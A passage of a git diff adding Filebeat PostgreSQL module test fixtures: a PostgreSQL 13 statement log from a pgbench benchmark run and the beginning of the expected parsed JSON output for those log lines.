postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.074 ms +2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.069 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.072 ms +2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: duration: 188.620 ms +2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: statement: commit +2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: duration: 11.135 ms +2021-03-17 15:18:04.366 UTC [154] 
postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: duration: 16.594 ms +2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: duration: 3.410 ms +2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:18:04.466 UTC [154] postgres@accounts LOG: duration: 79.842 ms +2021-03-17 15:18:04.466 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:18:04.467 UTC [154] postgres@accounts LOG: duration: 0.907 ms +2021-03-17 15:18:04.468 UTC [154] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:18:04.471 UTC [154] postgres@accounts LOG: duration: 3.192 ms +2021-03-17 15:18:04.471 UTC [154] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:18:04.473 UTC [154] postgres@accounts LOG: duration: 2.332 ms +2021-03-17 15:18:04.473 UTC [154] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:18:04.545 UTC [154] postgres@accounts LOG: duration: 71.641 ms +2021-03-17 15:18:05.633 UTC [170] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:18:05.634 UTC [170] postgres@postgres LOG: duration: 1.095 ms +2021-03-17 15:18:15.868 UTC [185] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + 
pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:18:15.869 UTC [185] postgres@postgres LOG: duration: 1.125 ms +2021-03-17 15:18:18.861 UTC [187] postgres@accounts LOG: statement: select count(*) from pgbench_branches +2021-03-17 15:18:18.863 UTC [187] postgres@accounts LOG: duration: 1.694 ms +2021-03-17 15:18:18.863 UTC [187] postgres@accounts LOG: statement: select o.n, p.partstrat, pg_catalog.count(i.inhparent) from pg_catalog.pg_class as c join pg_catalog.pg_namespace as n on (n.oid = c.relnamespace) cross join lateral (select pg_catalog.array_position(pg_catalog.current_schemas(true), n.nspname)) as o(n) left join pg_catalog.pg_partitioned_table as p on (p.partrelid = c.oid) left join pg_catalog.pg_inherits as i on (c.oid = i.inhparent) where c.relname = 'pgbench_accounts' and o.n is not null group by 1, 2 order by 1 asc limit 1 +2021-03-17 15:18:18.867 UTC [187] postgres@accounts LOG: duration: 4.281 ms +2021-03-17 15:18:18.868 UTC [187] postgres@accounts LOG: statement: vacuum pgbench_branches +2021-03-17 15:18:18.882 UTC [187] postgres@accounts LOG: duration: 13.791 ms +2021-03-17 15:18:18.883 UTC [187] postgres@accounts LOG: statement: vacuum pgbench_tellers +2021-03-17 15:18:18.884 UTC [187] postgres@accounts LOG: duration: 1.842 ms +2021-03-17 15:18:18.886 UTC [187] postgres@accounts LOG: statement: truncate pgbench_history +2021-03-17 15:18:18.897 UTC [187] postgres@accounts LOG: duration: 11.270 ms +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: duration: 5.739 ms +2021-03-17 15:18:19.012 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 1113 WHERE aid = 92718; +2021-03-17 15:18:19.016 UTC [188] postgres@accounts LOG: duration: 3.784 ms +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts 
WHERE aid = 92718; +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: duration: 0.372 ms +2021-03-17 15:18:19.021 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 1113 WHERE tid = 2; +2021-03-17 15:18:19.022 UTC [188] postgres@accounts LOG: duration: 0.902 ms +2021-03-17 15:18:19.022 UTC [188] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 1113 WHERE bid = 1; +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: duration: 0.407 ms +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (2, 1, 92718, 1113, CURRENT_TIMESTAMP); +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: duration: 0.384 ms +2021-03-17 15:18:19.023 UTC [188] postgres@accounts LOG: statement: END; +2021-03-17 15:18:19.025 UTC [188] postgres@accounts LOG: duration: 1.814 ms +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: duration: 0.267 ms +2021-03-17 15:18:19.600 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 4043 WHERE aid = 81209; +2021-03-17 15:18:19.602 UTC [189] postgres@accounts LOG: duration: 2.114 ms +2021-03-17 15:18:19.602 UTC [189] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 81209; +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: duration: 0.261 ms +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 4043 WHERE tid = 7; +2021-03-17 15:18:19.603 UTC [189] postgres@accounts LOG: duration: 0.728 ms +2021-03-17 15:18:19.604 UTC [189] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 4043 WHERE bid = 1; +2021-03-17 15:18:19.604 UTC [189] postgres@accounts LOG: duration: 0.699 ms +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: 
statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (7, 1, 81209, 4043, CURRENT_TIMESTAMP); +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: duration: 0.518 ms +2021-03-17 15:18:19.605 UTC [189] postgres@accounts LOG: statement: END; +2021-03-17 15:18:19.610 UTC [189] postgres@accounts LOG: duration: 4.495 ms +2021-03-17 15:18:20.137 UTC [190] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:20.137 UTC [190] postgres@accounts LOG: duration: 0.141 ms +2021-03-17 15:18:20.137 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 1240 WHERE aid = 12035; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.953 ms +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 12035; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.120 ms +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 1240 WHERE tid = 10; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.256 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 1240 WHERE bid = 1; +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: duration: 0.214 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (10, 1, 12035, 1240, CURRENT_TIMESTAMP); +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: duration: 0.191 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: END; +2021-03-17 15:18:20.140 UTC [190] postgres@accounts LOG: duration: 0.874 ms +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: duration: 0.282 ms +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: statement: UPDATE 
pgbench_accounts SET abalance = abalance + -3890 WHERE aid = 82888; +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: duration: 2.364 ms +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 82888; +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: duration: 0.339 ms +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3890 WHERE tid = 2; +2021-03-17 15:18:21.465 UTC [191] postgres@accounts LOG: duration: 0.716 ms +2021-03-17 15:18:21.465 UTC [191] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3890 WHERE bid = 1; +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: duration: 0.644 ms +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (2, 1, 82888, -3890, CURRENT_TIMESTAMP); +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: duration: 0.537 ms +2021-03-17 15:18:21.467 UTC [191] postgres@accounts LOG: statement: END; +2021-03-17 15:18:21.469 UTC [191] postgres@accounts LOG: duration: 2.604 ms +2021-03-17 15:18:21.551 UTC [192] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:21.551 UTC [192] postgres@accounts LOG: duration: 0.676 ms +2021-03-17 15:18:21.552 UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 2966 WHERE aid = 21833; +2021-03-17 15:18:21.554 UTC [192] postgres@accounts LOG: duration: 2.755 ms +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 21833; +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: duration: 0.329 ms +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 2966 WHERE tid = 9; +2021-03-17 15:18:21.556 UTC [192] postgres@accounts LOG: duration: 0.630 ms +2021-03-17 15:18:21.556 
UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 2966 WHERE bid = 1; +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: duration: 0.690 ms +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (9, 1, 21833, 2966, CURRENT_TIMESTAMP); +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: duration: 0.542 ms +2021-03-17 15:18:21.558 UTC [192] postgres@accounts LOG: statement: END; +2021-03-17 15:18:21.559 UTC [192] postgres@accounts LOG: duration: 1.938 ms +2021-03-17 15:18:22.825 UTC [193] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:22.825 UTC [193] postgres@accounts LOG: duration: 0.280 ms +2021-03-17 15:18:22.826 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -442 WHERE aid = 93281; +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: duration: 2.183 ms +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 93281; +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: duration: 0.302 ms +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -442 WHERE tid = 4; +2021-03-17 15:18:22.829 UTC [193] postgres@accounts LOG: duration: 0.703 ms +2021-03-17 15:18:22.829 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -442 WHERE bid = 1; +2021-03-17 15:18:22.830 UTC [193] postgres@accounts LOG: duration: 0.759 ms +2021-03-17 15:18:22.830 UTC [193] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 93281, -442, CURRENT_TIMESTAMP); +2021-03-17 15:18:22.831 UTC [193] postgres@accounts LOG: duration: 0.773 ms +2021-03-17 15:18:22.831 UTC [193] postgres@accounts LOG: statement: END; +2021-03-17 15:18:22.833 UTC [193] postgres@accounts LOG: duration: 2.048 
ms +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: duration: 0.316 ms +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -1591 WHERE aid = 2814; +2021-03-17 15:18:22.884 UTC [194] postgres@accounts LOG: duration: 2.911 ms +2021-03-17 15:18:22.884 UTC [194] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 2814; +2021-03-17 15:18:22.885 UTC [194] postgres@accounts LOG: duration: 0.695 ms +2021-03-17 15:18:22.885 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -1591 WHERE tid = 10; +2021-03-17 15:18:22.886 UTC [194] postgres@accounts LOG: duration: 0.902 ms +2021-03-17 15:18:22.886 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -1591 WHERE bid = 1; +2021-03-17 15:18:22.887 UTC [194] postgres@accounts LOG: duration: 0.863 ms +2021-03-17 15:18:22.887 UTC [194] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (10, 1, 2814, -1591, CURRENT_TIMESTAMP); +2021-03-17 15:18:22.888 UTC [194] postgres@accounts LOG: duration: 0.584 ms +2021-03-17 15:18:22.890 UTC [194] postgres@accounts LOG: statement: END; diff --git a/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json new file mode 100644 index 00000000000..537b6690903 --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json 
@@ -0,0 +1,2702 @@ +[ + { + "@timestamp": "2021-03-17T15:18:00.201Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 0, + "message": "2021-03-17 15:18:00.201 UTC [149] postgres@postgres LOG: statement: CREATE DATABASE accounts;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "CREATE DATABASE accounts;", + "postgresql.log.timestamp": "2021-03-17 15:18:00.201 UTC", + "process.pid": 149, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:00.631Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 430394016, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 95, + "message": "2021-03-17 15:18:00.631 UTC [149] postgres@postgres LOG: duration: 430.394 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:18:00.631 UTC", + "process.pid": 149, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 174, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": 
"drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 559000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 333, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: duration: 0.559 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 410, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.737Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4812000, + "event.kind": "event", + 
"event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 578, + "message": "2021-03-17 15:18:02.737 UTC [151] postgres@accounts LOG: duration: 4.812 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.737 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.738Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 655, + "message": "2021-03-17 15:18:02.738 UTC [151] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.738 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.740Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1900000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 830, + "message": "2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: duration: 1.900 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.740 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + 
"service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.740Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 907, + "message": "2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.740 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.741Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1444000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1086, + "message": "2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: duration: 1.444 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.741 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.741Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1163, + "message": "2021-03-17 15:18:02.741 UTC 
[151] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.741 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1336000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1331, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 1.336 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1408, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + 
"event.duration": 68000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1483, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 0.068 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1560, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 656000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1713, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.656 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" 
+ ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1790, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 538000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1914, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.538 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1991, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values 
